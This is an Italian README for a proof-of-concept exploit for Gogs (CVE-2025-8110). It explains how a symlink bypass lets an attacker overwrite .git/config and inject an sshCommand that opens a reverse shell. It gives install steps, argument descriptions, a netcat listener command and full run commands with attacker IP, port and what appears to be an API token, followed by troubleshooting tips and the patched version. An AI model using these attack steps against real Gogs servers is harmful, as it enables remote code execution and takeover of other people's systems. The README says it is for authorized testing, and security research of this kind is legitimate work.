
Gogs RCE PoC - CVE-2025-8110
Proof of Concept per CVE-2025-8110 - Esecuzione di codice remoto in Gogs tramite bypass di symlink e iniezione di sshCommand.
Questo exploit abusa di un bypass di symlink nell'API di Gogs per sovrascrivere .git/config e iniettare un sshCommand malevolo che esegue una reverse shell.
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt
Argomento Descrizione -u, --url URL target di Gogs (es. http://target:3000) -U, --username Nome utente Gogs -P, --password Password Gogs -t, --token Token API Gogs -lh, --host Il tuo IP per la reverse shell -lp, --port La tua porta per il listener -x, --proxy Abilita proxy (localhost:8080)
Accedi a Gogs → Impostazioni → Applicazioni → Genera token
nc -lvnp 4444
python3 exploit.py -u http://target:3000 -U <NOME_UTENTE_GOGS> -P <PASSWORD_GOGS> -t <TOKEN> -lh <IP_ATTACCANTE> -lp <PORTA_ATTACCANTE>
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444
Problema Soluzione Accesso fallito Controlla nome utente/password Creazione repository fallita Rigenera il token API Timeout di lettura Normale - controlla il listener Nessuna shell Controlla il firewall, prova una porta diversa
Aggiorna a Gogs v0.13.4 o successivo:
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz
Questo strumento è solo per test educativi e autorizzati. L'accesso non autorizzato è illegale.
Scoperta: Wiz Research
PoC originale: zAbuQasem
Exploit: X4BROZER